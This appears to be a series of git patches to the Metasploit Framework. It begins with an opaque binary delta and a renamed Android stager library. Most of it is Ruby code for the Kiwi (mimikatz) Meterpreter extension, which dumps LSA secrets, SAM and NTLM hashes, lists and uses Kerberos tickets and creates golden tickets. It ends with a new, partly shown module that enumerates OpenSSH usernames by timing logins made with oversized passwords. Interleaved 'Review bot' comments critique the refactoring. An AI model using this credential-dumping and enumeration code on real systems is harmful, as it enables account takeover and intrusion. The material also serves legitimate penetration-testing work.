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 diff --git a/data/android/libs/mips/libdalvikstager.so b/data/android/libs/mips/libndkstager.so similarity index 92% rename from data/android/libs/mips/libdalvikstager.so rename to data/android/libs/mips/libndkstager.so index ad370966a9862e32914134b25ecc6d2521a26ae6..973ffe39a721b9eee2ddc9952246fb7508b36ca6 100644 GIT binary patch delta 92 zcmcbhc|mi7D+^CvN_KHcVtQ(kUUB~9P!{dU3XCk98(1c>umkG&jPE9=3dysEuz&I6*pPa;^!6-JlnZrUB zn|zzyfi=L#-_d2W0>>LRK@(;M1`(i6K`54)EX!}sc?`${8F*%LEdOHJE})uOK)ecw zcLDJ!Aif2}uYma1W?6w`M#f{48wKTA&oF_sEEQB{l>ti0Og;-_fh;hY{1wP50kTRq J%L=(O0RV=cKj;7e delta 237 zcmaE&@kC?8UM7K*#GJCs?BbHd^wc7~;(Uh9Cz+fXCkwD>F?vn5W>I4_o}9#@!6-Gk znZrVsntYqxffa20W(AHnY=Rcd3=ASboq|xTFj=##IRF45_YPzL delta 45 ucmdnXx0jDMz?+#xgn@&DgF$0j) Date: Fri, 28 Mar 2014 11:03:03 +1000 Subject: [PATCH 080/853] Fix typo in kiwi help --- lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 8db656180c..6699e6ac37 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb 
@@ -67,7 +67,7 @@ class Console::CommandDispatcher::Kiwi
 "creds_all" => "Attempt to retrieve all credentials",
 "golden_ticket_create" => "Attempt to create a golden kerberos ticket",
 "kerberos_ticket_use" => "Attempt to use a kerberos ticket",
- "kerberos_ticket_purge" => "Attempt to purege any in-use kerberos tickets",
+ "kerberos_ticket_purge" => "Attempt to purge any in-use kerberos tickets",
 "kerberos_ticket_list" => "Attempt to list all kerberos tickets",
 "lsa_dump" => "Attempt to dump LSA secrets"
 }
From 65e204e8344ab1155f564b754b6cecc580a93b56 Mon Sep 17 00:00:00 2001
From: OJ
Date: Fri, 28 Mar 2014 11:03:38 +1000
Subject: [PATCH 081/853] Modify the menu item descriptions
---
 .../ui/console/command_dispatcher/kiwi.rb | 24 +++++++++----------
 1 file changed, 12 insertions(+), 12 deletions(-)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
index 6699e6ac37..7b2da80af7 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -58,18 +58,18 @@ class Console::CommandDispatcher::Kiwi # def commands { - "creds_wdigest" => "Attempt to retrieve WDigest creds", - "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", - "creds_livessp" => "Attempt to retrieve LiveSSP creds", - "creds_ssp" => "Attempt to retrieve SSP creds", - "creds_tspkg" => "Attempt to retrieve TsPkg creds", - "creds_kerberos" => "Attempt to retrieve Kerberos creds", - "creds_all" => "Attempt to retrieve all credentials", - "golden_ticket_create" => "Attempt to create a golden kerberos ticket", - "kerberos_ticket_use" => "Attempt to use a kerberos ticket", - "kerberos_ticket_purge" => "Attempt to purge any in-use kerberos tickets", - "kerberos_ticket_list" => "Attempt to list all kerberos tickets", - "lsa_dump" => "Attempt to dump LSA secrets" + "creds_wdigest" => "Retrieve WDigest creds", + "creds_msv" => "Retrieve LM/NTLM creds (hashes)", + "creds_livessp" => "Retrieve LiveSSP creds", + "creds_ssp" => "Retrieve SSP creds", + "creds_tspkg" => "Retrieve TsPkg creds", + "creds_kerberos" => "Retrieve Kerberos creds", + "creds_all" => "Retrieve all credentials", + "golden_ticket_create" => "Create a golden kerberos ticket", + "kerberos_ticket_use" => "Use a kerberos ticket", + "kerberos_ticket_purge" => "Purge any in-use kerberos tickets", + "kerberos_ticket_list" => "List all kerberos tickets", + "lsa_dump" => "Dump LSA secrets" } end From 86ddd24d26475a6876690f5634d670ea9b85e8e5 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 28 Mar 2014 16:12:51 +1000 Subject: [PATCH 082/853] Update to use Rex::Text and change handling a bit This change also outputs blank creds so that users know which accounts have blank passwords --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 101 +++++------------- .../ui/console/command_dispatcher/kiwi.rb | 53 +++++---- lib/rex/text.rb | 21 ++++ 3 files changed, 76 insertions(+), 99 deletions(-) 
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 8851551ad9..8a5e7f2855 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -87,8 +87,8 @@ class Kiwi < Extension :major => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MAJ), :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN), :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME), - :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), - :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), + :syskey => response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY), + :nt5key => response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY), :nt6keys => [], :secrets => [], :samkeys => [] 
@@ -96,32 +96,29 @@ class Kiwi < Extension response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| result[:nt6keys] << { - :id => to_guid(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID)), - :value => to_hex_string(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE)) + :id => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID), + :value => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE) } end response.each(TLV_TYPE_KIWI_LSA_SECRET) do |s| - r = { - :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME), - :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV), - :ntlm => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM)), - :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR), - :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD) + result[:secrets] << { + :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME), + :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV), + :ntlm => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM), + :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR), + :current_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW), + :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD), + :old_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW) } - - r[:current] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW)) - r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) - - result[:secrets] << r end response.each(TLV_TYPE_KIWI_LSA_SAM) do |s| result[:samkeys] << { :rid => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_RID), :user => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_USER), - :ntlm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH)), - :lm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH)) + :ntlm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH), + :lm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH) } end 
@@ -132,7 +129,7 @@ class Kiwi < Extension # Convert a flag set to a list of string representations for the bit flags # that are set. # - # +flags+ [Integer] - Integer bitmask of Kerberos token flags. + # @param flags [Integer] - Integer bitmask of Kerberos token flags. # # Returns [String] # @@ -154,7 +151,7 @@ class Kiwi < Extension # # List available kerberos tickets. # - # +export+ [Bool] - Set to +true+ to export the content of each ticket + # @param export [Bool] - Set to +true+ to export the content of each ticket # # Returns [Array[Hash]] # @@ -187,7 +184,7 @@ class Kiwi < Extension # # Use the given ticket in the current session. # - # +ticket+ [Array[Byte]] - Content of the Kerberos ticket to use. + # @param icket [Array[Byte]] - Content of the Kerberos ticket to use. # # Returns [Bool] # @@ -212,10 +209,10 @@ class Kiwi < Extension # # Create a new golden kerberos ticket on the target machine and return it. # - # +user+ [String] - Name of the user to create the ticket for. - # +domain+ [String] - Domain name. - # +sid+ [String] - SID of the domain. - # +tgt+ [String] - The kerberos ticket granting token. + # @param user [String] - Name of the user to create the ticket for. + # @param domain [String] - Domain name. + # @param sid [String] - SID of the domain. + # @param tgt [String] - The kerberos ticket granting token. # # Returns [Array[Byte]] # @@ -234,7 +231,7 @@ class Kiwi < Extension # # Scrape passwords from the target machine. # - # +pwd_id+ - ID of the type credential to scrape. + # @param pwd_id - ID of the type credential to scrape. # # Returns [Array[Hash]] # 
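Review bot: The converted tag in the `@@ -187,7 +184,7 @@` hunk reads `# @param icket [Array[Byte]]`, which drops the first letter of the parameter name; it should be `# @param ticket [Array[Byte]] - Content of the Kerberos ticket to use.`. The hunks on this line move the parameters to `@param` but leave the return values as plain `# Returns [...]` lines, so `@return` would keep the tags consistent. `# @param pwd_id - ID of the type credential to scrape.` is also the only tag without a type.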
@@ -251,8 +248,8 @@ class Kiwi < Extension :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD), :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), - :lm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH)), - :ntlm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)) + :lm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH), + :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH) } end @@ -322,56 +319,6 @@ class Kiwi < Extension scrape_passwords(PWD_ID_SEK_KERBEROS) end -protected - - # - # Convert an array of bytes to a string-based hex dump in the format - # AA BB CC DD EE FF - # - # +bytes+ [Array[Byte]] - Array of bytes to convert. - # - # Returns [String]. - # - def to_hex_dump(bytes) - return nil unless bytes - - bytes.each_byte.map { |b| - b.to_s(16).rjust(2, '0') - }.join(' ') - end - - # - # Convert an array of bytes to a hex string without spaces - # AABBCCDDEEFF - # - # +bytes+ [Array[Byte]] - Array of bytes to convert. - # - # Returns [String]. - # - def to_hex_string(bytes) - return nil unless bytes - bytes.unpack('H*')[0] - end - - # - # Convert an array of bytes to a GUID string - # - # +bytes+ Array of bytes to convert. - # - # Returns [String]. - # - def to_guid(bytes) - return nil unless bytes - s = bytes.unpack('H*')[0] - parts = [ - s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], - s[10, 2] + s[8, 2], - s[14, 2] + s[12, 2], - s[16, 4], - s[20, 12] - ] - "{#{parts.join('-')}}" - end end end; end; end; end; end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 7b2da80af7..5af48e04bf 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb 
@@ -77,7 +77,7 @@ class Console::CommandDispatcher::Kiwi # Invoke the LSA secret dump on thet target. # def cmd_lsa_dump(*args) - get_privs + check_privs print_status("Dumping LSA secrets") lsa = client.kiwi.lsa_dump @@ -86,9 +86,9 @@ class Console::CommandDispatcher::Kiwi # use within a table so instead we'll dump in a linear fashion print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major] - print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] - print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] - print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] + print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] + print_line("System Key : #{to_hex(lsa[:syskey])}") + print_line("NT5 Key : #{to_hex(lsa[:nt5key])}") print_line print_line("NT6 Key Count : #{lsa[:nt6keys].length}") @@ -96,8 +96,8 @@ class Console::CommandDispatcher::Kiwi lsa[:nt6keys].to_enum.with_index(1) do |k, i| print_line index = i.to_s.rjust(2, ' ') - print_line("#{index}. ID : #{k[:id]}") - print_line("#{index}. Value : #{k[:value]}") + print_line("#{index}. ID : #{Rex::Text::to_guid(k[:id])}") + print_line("#{index}. Value : #{to_hex(k[:value])}") end end @@ -109,9 +109,15 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. Name : #{s[:name]}") print_line("#{index}. Service : #{s[:service]}") if s[:service] - print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] - print_line("#{index}. Current : #{s[:current]}") if s[:current] - print_line("#{index}. Old : #{s[:old]}") if s[:old] + print_line("#{index}. NTLM : #{to_hex(s[:ntlm])}") if s[:ntlm] + if s[:current] || s[:current_raw] + current = s[:current] || to_hex(s[:current_raw], ' ') + print_line("#{index}. Current : #{current}") + end + if s[:old] || s[:old_raw] + old = s[:old] || to_hex(s[:old_raw], ' ') + print_line("#{index}. Old : #{old}") + end end end 
@@ -123,8 +129,8 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. RID : #{s[:rid]}") print_line("#{index}. User : #{s[:user]}") - print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] - print_line("#{index}. NTLM Hash : #{s[:ntlm_hash]}") if s[:ntlm_hash] + print_line("#{index}. LM Hash : #{to_hex(s[:lm_hash])}") + print_line("#{index}. NTLM Hash : #{to_hex(s[:ntlm_hash])}") end end @@ -371,15 +377,9 @@ class Console::CommandDispatcher::Kiwi protected - def get_privs + def check_privs unless system_check - print_status("Attempting to getprivs") - privs = client.sys.config.getprivs - unless privs.include? "SeDebugPrivilege" - print_warning("Did not get SeDebugPrivilege") - else - print_good("Got SeDebugPrivilege") - end + print_warning("Not running as SYSTEM, execution may fail") else print_good("Running as SYSTEM") end @@ -403,7 +403,7 @@ protected # appropriate function on the client that returns the results from Meterpreter. # def scrape_passwords(provider, method) - get_privs + check_privs print_status("Retrieving #{provider} credentials") accounts = method.call @@ -423,8 +423,8 @@ protected acc[:username] || "", acc[:password] || "", "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", - acc[:lm] || "", - acc[:ntlm] || "" + to_hex(acc[:lm] || ""), + to_hex(acc[:ntlm] || "") ] end @@ -432,6 +432,15 @@ protected return true end + # + # Helper function to convert a potentially blank value to hex and have the + # outer spaces stripped + # + def to_hex(value, sep = '') + value ||= "" + Rex::Text::to_hex(value, sep).strip + end + end end diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 9fe170f3b4..c29b3d4ca3 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb 
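Review bot: The `to_hex(value, sep = '')` helper added in the last hunk of this file names its second parameter `sep`, but it is passed to `Rex::Text::to_hex` as the per-byte prefix, which is why the result needs `.strip`. Naming it `prefix`, or adding a comment such as `# sep is emitted before every byte; strip drops the leading one`, would make that visible. In the `scrape_passwords` hunk, `to_hex(acc[:lm] || "")` and `to_hex(acc[:ntlm] || "")` repeat the default the helper already applies with `value ||= ""`, so `to_hex(acc[:lm])` is enough.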
@@ -1233,6 +1233,27 @@ module Text "{#{[8,4,4,4,12].map {|a| rand_text_hex(a) }.join("-")}}" end + # + # Convert an array of 16 bytes to a GUID string + # + # @param bytes [Array[Byte]] Array of 16 bytes which represent a GUID + # in the proper order. + # + # Returns [String]. + # + def self.to_guid(bytes) + return nil unless bytes + s = bytes.unpack('H*')[0] + parts = [ + s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], + s[10, 2] + s[8, 2], + s[14, 2] + s[12, 2], + s[16, 4], + s[20, 12] + ] + "{#{parts.join('-')}}" + end + # # Creates a pattern that can be used for offset calculation purposes. This # routine is capable of generating patterns using a supplied set and a From bca0d603ef1432115e7c5a2f4dba6c875d6000e8 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 28 Mar 2014 16:23:48 +0100 Subject: [PATCH 083/853] SSH user enumeration script --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 169 ++++++++++++++++++ 1 file changed, 169 insertions(+) create mode 100644 modules/auxiliary/scanner/ssh/ssh_enumusers.rb diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb new file mode 100644 index 0000000000..7aacfd7b99 --- /dev/null +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
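Review bot: `Rex::Text.to_guid` documents a 16-byte input but only guards against nil, so a shorter value either yields a malformed GUID or raises NoMethodError when a slice such as `s[6, 2]` returns nil before the `+`. A length guard like `return nil unless bytes && bytes.length == 16` would match the documented contract. The `@param bytes [Array[Byte]]` type also disagrees with the body, which calls `bytes.unpack('H*')` and therefore expects a String. The enclosing `Text` module starts and ends outside the hunk.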
@@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell + + attr_accessor :ssh_socket, :good_credentials + + THRESHOLD = 10 + + def initialize + super( + 'Name' => 'SSH Username Enumeration', + 'Description' => %q{ + This module uses a time-based attack to enumerate users in a OpenSSH server. + }, + 'Author' => ['kenkeiras'], + 'References' => [], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('USER_FILE', + [true, 'File containing usernames, one per line', nil]), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', + [false, 'Enable SSH debugging output (Extreme verbosity!)', + false]), + + OptInt.new('SSH_TIMEOUT', + [false, 'Specify the maximum time to negotiate a SSH session', + 10]), + + OptInt.new('RETRY_NUM', + [true , 'The number of attempts to connect to a SSH server' \ + ' for each user', 3]) + ] + ) + + deregister_options('RHOST') + @good_credentials = {} + end + + + def rport + datastore['RPORT'] + end + + def retry_num + datastore['RETRY_NUM'] + end + + + def check_user(ip, user, port) + pass = 'A' * 64_000 + + opt_hash = { + :auth_methods => ['password', 'keyboard-interactive'], + :msframework => framework, + :msfmodule => self, + :port => port, + :disable_agent => true, + :password => pass, + :config => false, + :proxies => datastore['Proxies'] + } + + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + start_time = Time.new + + begin + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(ip, user, opt_hash) + end + + rescue Rex::ConnectionError, Rex::AddressInUse + return :connection_error + + rescue Net::SSH::Disconnect, ::EOFError + return :success + + 
